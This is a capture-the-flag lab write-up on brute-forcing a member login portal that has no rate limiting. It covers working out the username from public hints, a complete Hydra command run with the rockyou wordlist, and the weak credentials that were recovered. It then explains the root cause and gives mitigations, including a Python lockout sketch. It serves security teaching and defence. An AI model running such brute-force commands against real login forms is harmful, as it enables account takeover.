Weak Credentials – Authentication Compromise via Password Brute Force | Halftrack Model Railroad Club
Lab Link
Lab: Halftrack Model Railroad Club
Overview
The Halftrack Model Railroad Club challenge demonstrates an authentication weakness caused by predictable usernames, weak passwords, and missing rate limiting.
The application exposed a member login portal that allowed unlimited authentication attempts. Combined with publicly available user information and poor password choices, this enabled successful credential guessing through brute force.
The vulnerability was not caused by SQL injection or authentication bypass logic. The application simply lacked defensive controls against repeated login attempts.
Objective
Identify a valid username, brute force the password, and gain access to the member portal.
Vulnerability Classification Hierarchy
OWASP Category
└── A07: Identification and Authentication Failures
└── Weak Authentication Controls
└── Password Brute Force
└── Missing Login Rate Limiting with Weak Credentials
Reconnaissance
The member login portal was available at:
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/login
A hint on the login page stated:
Username is firstinitial + lastname
(lowercase, no spaces or dots)
This disclosed the username generation format.
Additional information gathering was performed on:
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/about
The page identified the club president:
Hollis Kerrigan
Using the provided naming convention:
h + kerrigan
Generated username:
hkerrigan
Exploitation
Since the challenge scenario specifically mentioned:
There is no rate limit on the login form
password brute forcing became practical.
Hydra command:
hydra -l hkerrigan \
-P /usr/share/wordlists/rockyou.txt \
b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com \
https-post-form "/login:username=^USER^&password=^PASS^:Incorrect username or password"
Hydra repeatedly attempted passwords from the supplied wordlist.
Successful credentials:
hkerrigan : password1
Proof of Exploitation
Using the recovered credentials:
Username: hkerrigan
Password: password1
Access was granted to:
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/member/dashboard
Dashboard contents exposed:
WEBVERSE{.....}
Attack path:
Public Information
↓
Username Enumeration
↓
Predictable Username Generation
↓
Password Brute Force
↓
Authentication Success
↓
Dashboard Access
Root Cause
The compromise resulted from several issues occurring together:
Predictable username scheme
firstinitial + lastname
Weak password selection
password1
Missing login protections
No controls existed to detect or slow repeated attempts.
Likely implementation:
if username_exists:
check_password()
without:
limit_attempts()
lock_account()
monitor_behavior()
Impact
In real-world environments these weaknesses can lead to:
- Account takeover
- Unauthorized portal access
- Credential stuffing success
- Administrative compromise
- Sensitive data exposure
- Internal application access
Brute force attacks frequently succeed against users with weak passwords.
Mitigation
Enforce strong password requirements
Weak:
password1
welcome123
admin123
Stronger examples:
Random long passphrases
Implement rate limiting
Example:
5 failed attempts
↓
Temporary lockout
Add account lockouts
Restrict repeated attempts:
Maximum failed attempts
Cooldown period
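As an added illustration (not code from the lab or from Halftrack's application), the following Python sketch shows what the missing `limit_attempts()` / `lock_account()` controls from the Root Cause section look like in practice: five consecutive failures on a username trigger a temporary lockout, and during the cooldown even the correct password is refused. The user store, the PBKDF2 hashing and the 15-minute cooldown are assumptions for the example.

```python
import hashlib, hmac, os, time

MAX_FAILED = 5             # "5 failed attempts" from the mitigation section
LOCKOUT_SECONDS = 15 * 60  # assumed cooldown period

# Constructed user store: username -> (salt, PBKDF2 hash). A real application
# would use a dedicated password hasher (argon2/bcrypt) backed by a database.
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = os.urandom(16)
USERS = {"hkerrigan": (_SALT, _hash("password1", _SALT))}  # the lab's weak password

class LoginGuard:
    """Tracks consecutive failed logins per username and enforces a lockout."""
    def __init__(self, clock=time.time):
        self.clock = clock         # injectable so the cooldown can be tested
        self.failed = {}           # username -> consecutive failure count
        self.lock_until = {}       # username -> unix time when the lockout ends

    def locked(self, username: str) -> bool:
        until = self.lock_until.get(username, 0.0)
        if self.clock() < until:
            return True
        if until:                  # lockout expired: clear the counters
            self.lock_until.pop(username, None)
            self.failed.pop(username, None)
        return False

    def record_failure(self, username: str) -> None:
        n = self.failed.get(username, 0) + 1
        self.failed[username] = n
        if n >= MAX_FAILED:
            self.lock_until[username] = self.clock() + LOCKOUT_SECONDS

    def record_success(self, username: str) -> None:
        self.failed.pop(username, None)
        self.lock_until.pop(username, None)

def login(guard: LoginGuard, username: str, password: str) -> str:
    """Returns 'locked', 'ok' or 'denied'."""
    if guard.locked(username):
        return "locked"            # the password is not even evaluated
    salt, expected = USERS.get(username, (b"", b""))
    # Hash unconditionally so unknown usernames cost the same time as known ones
    ok = bool(expected) and hmac.compare_digest(_hash(password, salt), expected)
    if ok:
        guard.record_success(username)
        return "ok"
    guard.record_failure(username)
    return "denied"
```

Failure counters here are kept in process memory; a real deployment would keep them in a shared store so that every application instance sees the same lockout state.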
Implement MFA
Authentication should include:
Password
+
Additional verification factor
Monitor suspicious activity
Alert on:
Repeated failed logins
High request volume
Credential stuffing patterns
Real-World Insight
Password attacks frequently succeed because attackers combine:
- Public information
- Username patterns
- Common passwords
- Password reuse
- Missing rate limiting
Organizations often assume:
Nobody would guess that username
or:
Users choose strong passwords
Attackers routinely automate these steps and test thousands of combinations within minutes.
